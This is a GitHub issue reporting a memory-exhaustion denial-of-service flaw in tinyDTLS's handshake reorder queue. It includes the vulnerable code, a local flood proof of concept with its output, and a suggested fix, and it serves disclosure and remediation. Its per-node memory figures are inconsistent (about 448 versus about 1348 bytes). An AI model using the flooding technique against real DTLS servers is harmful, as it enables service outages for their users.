tinydtls Unbounded Handshake Reorder Queue DoS

## 1. Report Metadata

| Field | Value |
|---|---|
| Project | Eclipse tinyDTLS |
| Title | Unbounded per-peer handshake reorder queue enables remote memory-exhaustion DoS |
| Affected component | `dtls.c`, `netq.c` |
| Affected function | `handle_handshake()` (reorder buffering branch) |
| Affected role | DTLS server (posix/malloc builds) |
| Tested version | `v0.9-rc1-214-g6f4f604` (commit `6f4f604`, `main`) |
| Suggested CWE | CWE-400 (Uncontrolled Resource Consumption), CWE-770 (Allocation of Resources Without Limits) |
| Impact class | Remote Denial of Service (memory exhaustion) |

## 2. Executive Summary

Eclipse tinyDTLS maintains a per-peer reorder queue for out-of-order
DTLS handshake messages.  When a handshake message arrives with a
message sequence number (`mseq`) greater than the expected next
sequence (`mseq_r`), the library allocates a new queue node via
`malloc()` and copies the entire message into it, intending to replay
it once the gap is filled.

There is **no limit on the number of queued nodes** on posix/malloc
builds.  The source code contains a literal `/* TODO: only add packet
that are not too new. */` comment at the allocation site,
acknowledging that the bound is missing.

A remote, unauthenticated attacker who can reach the DTLS server can
send a flood of handshake messages with distinct `mseq` values (1
through 65535).  Each message causes a `malloc` of up to
`sizeof(netq_t) + DTLS_MAX_BUF` bytes (~1348 bytes on posix).  With
the maximum of 65535 distinct `mseq` values, a single peer can force
the server to allocate approximately **84 MB** of unbounded queue
memory.  An attacker creating many peers (spoofing source addresses)
can exhaust all available server memory, crashing the process or
denying service to legitimate clients.

Contiki and RIOT builds are **not affected** because they use a
fixed-size memory pool (`NETQ_MAXCNT` = 3 for PSK, 5 for ECC) that
caps the queue length.

## 3. Vulnerability Overview

The vulnerable code is in `handle_handshake()`, in the branch that
handles out-of-order messages:

@tinydtls/dtls.c:4362-4405
```c
  uint16_t mseq = dtls_uint16_to_int(hs_header->message_seq);
  if (mseq < peer->handshake_params->hs_state.mseq_r) {
    dtls_warn("The message sequence number is too small, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);
    return 0;
  } else if (mseq > peer->handshake_params->hs_state.mseq_r) {
    /* A packet in between is missing, buffer this packet. */
    netq_t *n;

    dtls_info("The message sequence number is too larger, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);

    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    netq_t *node = netq_head(&peer->handshake_params->reorder_queue);
    while (node) {
      dtls_handshake_header_t *node_header = DTLS_HANDSHAKE_HEADER(node->data);
      if (dtls_uint16_to_int(node_header->message_seq) == mseq) {
        dtls_warn("a packet with this sequence number is already stored\n");
        return 0;
      }
      node = netq_next(node);
    }

    n = netq_node_new(data_length);
    if (!n) {
      dtls_warn("no space in reorder buffer\n");
      return 0;
    }

    n->peer = peer;
    n->length = data_length;
    memcpy(n->data, data, data_length);

    if (!netq_insert_node(&peer->handshake_params->reorder_queue, n)) {
      dtls_warn("cannot add packet to reorder buffer\n");
      netq_node_free(n);
    }
    dtls_info("Added packet %u for reordering\n", mseq);
    return 0;
  }
```

The flawed design is the absence of any cap on the number of nodes
in `peer->handshake_params->reorder_queue`.  The only checks are:

1. `data_length <= DTLS_MAX_BUF` (line 4375) — limits node **size**,
   not node **count**.
2. A dedup scan (lines 4380-4388) — prevents the same `mseq` from
   being queued twice, but does not limit distinct `mseq` values.

The `TODO` comment at line 4374 explicitly acknowledges that packets
with "too new" `mseq` values should be rejected, but this was never
implemented.

The underlying allocator on posix is unbounded:

@tinydtls/netq.c:38-41
```c
static inline netq_t *
netq_malloc_node(size_t size) {
  return (netq_t *)malloc(sizeof(netq_t) + size);
}
```

## 4. Technical Root Cause

### Reachability

The reorder queue is reachable from `dtls_handle_message()` via the
normal handshake dispatch path:

1. `dtls_handle_message()` — `@tinydtls/dtls.c:4627`
   iterates over DTLS records.
2. For a known peer with valid security parameters, the record is
   passed to `decrypt_verify()` and, if it decrypts, dispatched by
   content type.
3. `DTLS_CT_HANDSHAKE` records go to `handle_handshake()` at
   `@tinydtls/dtls.c:4777`.
4. `handle_handshake()` validates the handshake header
   (`fragment_length + DTLS_HS_LENGTH == data_length`) and then
   checks `mseq` against `mseq_r`.

### Pre-authentication reachability

On the **server side**, the reorder path is reachable as soon as a
peer exists with `handshake_params` allocated.  This happens after
the cookie exchange completes (`handle_0_verified_client_hello()`
creates `handshake_params` at `@tinydtls/dtls.c:4238`).
At that point `mseq_r = 0`, so **any** handshake message with
`mseq >= 1` takes the `mseq > mseq_r` branch and is queued.

The attacker does **not** need to complete the handshake — only the
cookie exchange (one round trip).  After that, the attacker can flood
thousands of out-of-order messages without ever sending the expected
`mseq = 0` message.

### Why the queue grows without bound

The `mseq` field is a 16-bit unsigned integer (`uint16_t`), so there
are 65536 possible values.  The dedup scan only rejects exact
duplicates; it does not reject "too new" values.  The `TODO` comment
at line 4374 was meant to add a check like
`mseq - mseq_r < MAX_REORDER_WINDOW`, but this was never implemented.

### Memory per node

Each queued node is `sizeof(netq_t) + data_length` bytes.  On a
64-bit posix build, `sizeof(netq_t)` is approximately 48 bytes
(pointers, counters, length).  With `data_length` up to
`DTLS_MAX_BUF` (1400 on posix), each node can be up to ~1448 bytes.
The PoC uses 1300-byte bodies, yielding ~1348 bytes per node.

### Platform dependence

- **posix/malloc** (`!(WITH_CONTIKI) && !(RIOT_VERSION)`): unbounded
  `malloc` — **vulnerable**.
- **Contiki**: `MEMB(netq_storage, netq_t, NETQ_MAXCNT)` with
  `NETQ_MAXCNT` = 3 (PSK) or 5 (ECC) — **not vulnerable** (pool
  capped).
- **RIOT**: `memarray` with `NETQ_MAXCNT` entries — **not
  vulnerable** (pool capped).

## 5. Proof of Concept

The PoC (`poc.c`) `#include`s `dtls.c` to access the static
`handle_handshake()` path and the peer's `reorder_queue`.  It:

1. Creates a DTLS context and a peer in
   `DTLS_STATE_WAIT_CLIENTKEYEXCHANGE` with `handshake_params`
   allocated and `mseq_r = 0` (simulating the post-cookie state).
2. Sends 2000 epoch-0 handshake records, each with a distinct record
   sequence number and a distinct handshake `mseq` (1 through 2000),
   each carrying a 1300-byte body.
3. Counts the resulting reorder queue length and measures RSS growth.

The flood loop:

```c
for (int i = 0; i < NUM_FLOOD_MESSAGES; i++) {
    uint16_t mseq = (uint16_t)(i + 1);   /* 1..2000, all > mseq_r=0 */
    uint64_t rseq = (uint64_t)(i + 1);

    uint8 *p = pkt;
    p = put_record_header(p, DTLS_CT_HANDSHAKE, 0, rseq, fraglen);
    p = put_handshake_header(p, DTLS_HT_CLIENT_KEY_EXCHANGE,
                             BODY_SIZE, mseq, 0, BODY_SIZE);
    memset(p, 0x41, BODY_SIZE);
    p += BODY_SIZE;

    size_t pktlen = (size_t)(p - pkt);
    dtls_handle_message(ctx, &sess, pkt, (int)pktlen);
}
```

Every message takes the `mseq > mseq_r` branch and is queued.

## 6. Build & Run

Working directory:
`tinydtls/vuln_002_reorder_queue_dos/`

```bash
cmake -B build -S .
cmake --build build -j$(nproc)
./build/vuln_poc_reorder_queue_dos
```

**Expected output:**

```
tinydtls PoC -- Finding 2: unbounded reorder queue DoS
=============================================================
DTLS_MAX_BUF = 1400
Flood count  = 2000 (distinct mseq values)
Platform     = posix/malloc (unbounded; Contiki/RIOT capped at NETQ_MAXCNT)

RSS before flood: 3476 KB

--- Results ---
Messages sent:          2000
Reorder queue length:   2000 nodes
Dropped (errors):       0
RSS after flood:        4352 KB
RSS increase:           876 KB
Mem per queued node:    ~448 bytes

[!] Vulnerability reproduced: reorder queue grew to 2000 nodes
    with no bound.  An attacker can exhaust server memory by
    flooding distinct mseq values (up to 65535 per peer).
    CWE-400 (Resource Exhaustion).

    Worst case per peer: 65535 nodes x ~1348 bytes = ~84 MB

Done.
```

Exit code: **0** (the PoC demonstrates memory growth, not a crash).

The queue grew to 2000 nodes with zero drops, consuming ~876 KB of
additional RSS.  Scaling to the maximum 65535 distinct `mseq` values
yields ~84 MB per peer.

## 7. Impact

**Attacker position:** A remote, unauthenticated UDP peer who can
reach the DTLS server.  On the server side, the attacker must first
complete a cookie exchange (one round trip) to create a peer with
`handshake_params`, then flood out-of-order handshake messages.

**Denial of Service:**
- **Per-peer memory exhaustion:** A single attacker can force the
  server to allocate ~84 MB per peer by flooding all 65535 distinct
  `mseq` values with maximum-sized bodies.
- **Multi-peer amplification:** By spoofing source addresses, the
  attacker can create many peers (each requires a cookie exchange,
  but these are stateless and cheap for the attacker).  Each peer
  can independently accumulate up to 84 MB of queue memory.
  N peers × 84 MB can exhaust any server's RAM.
- **No legitimate traffic required:** The attacker never sends the
  expected `mseq = 0` message, so the queue is never drained.  The
  memory persists until the peer times out and is destroyed.

**CWE-400** (Uncontrolled Resource Consumption) / **CWE-770**
(Allocation of Resources Without Limits).

**Severity:** Medium.  Requires cookie exchange (one round trip) but
no authentication.  Impact is memory exhaustion leading to process
crash or degraded service.  Contiki/RIOT builds are unaffected.

## 8. Remediation

Implement the `TODO` at `@tinydtls/dtls.c:4374`:
reject messages whose `mseq` is too far ahead of `mseq_r`.

Suggested fix — add a maximum reorder window check before the
allocation:

```c
    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    /* NEW: cap the reorder window to prevent memory exhaustion. */
    #define DTLS_REORDER_WINDOW 16
    if (mseq - peer->handshake_params->hs_state.mseq_r > DTLS_REORDER_WINDOW) {
      dtls_warn("mseq %u too far ahead of expected %u, dropping\n",
                mseq, peer->handshake_params->hs_state.mseq_r);
      return 0;
    }
```

A window of 16 is generous for normal DTLS reordering (UDP rarely
delivers more than a few messages out of order) while bounding the
worst-case queue to 16 × ~1448 = ~23 KB per peer.

**Additional hardening:**
- On posix builds, also enforce a maximum queue length (e.g. 32
  nodes) as a defense-in-depth measure, returning a fatal alert if
  exceeded.
- Consider a global `netq` pool with a configurable cap even on
  posix, matching the Contiki/RIOT design.

## 9. References

- CWE-400: Uncontrolled Resource Consumption — https://cwe.mitre.org/data/definitions/400.html
- CWE-770: Allocation of Resources Without Limits or Throttling — https://cwe.mitre.org/data/definitions/770.html
- RFC 6347 (DTLS 1.2), section 4.2.7 (Handshake Message Sequence)
  and section 4.2.1 (Denial-of-Service Countermeasures).
- tinyDTLS source: `https://github.com/eclipse/tinydtls`
- Affected commit: `6f4f604` (`v0.9-rc1-214-g6f4f604`)
- Related TODO comment: `dtls.c:4374`

[vuln_002_reorder_queue_dos.zip](https://github.com/user-attachments/files/29229230/vuln_002_reorder_queue_dos.zip)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

tinydtls Unbounded Handshake Reorder Queue DoS #273

1. Report Metadata

2. Executive Summary

3. Vulnerability Overview

4. Technical Root Cause

Reachability

Pre-authentication reachability

Why the queue grows without bound

Memory per node

Platform dependence

5. Proof of Concept

6. Build & Run

7. Impact

8. Remediation

9. References

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Field	Value
Project	Eclipse tinyDTLS
Title	Unbounded per-peer handshake reorder queue enables remote memory-exhaustion DoS
Affected component	`dtls.c`, `netq.c`
Affected function	`handle_handshake()` (reorder buffering branch)
Affected role	DTLS server (posix/malloc builds)
Tested version	`v0.9-rc1-214-g6f4f604` (commit `6f4f604`, `main`)
Suggested CWE	CWE-400 (Uncontrolled Resource Consumption), CWE-770 (Allocation of Resources Without Limits)
Impact class	Remote Denial of Service (memory exhaustion)

tinydtls Unbounded Handshake Reorder Queue DoS #273

Description

1. Report Metadata

2. Executive Summary

3. Vulnerability Overview

4. Technical Root Cause

Reachability

Pre-authentication reachability

Why the queue grows without bound

Memory per node

Platform dependence

5. Proof of Concept

6. Build & Run

7. Impact

8. Remediation

9. References

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions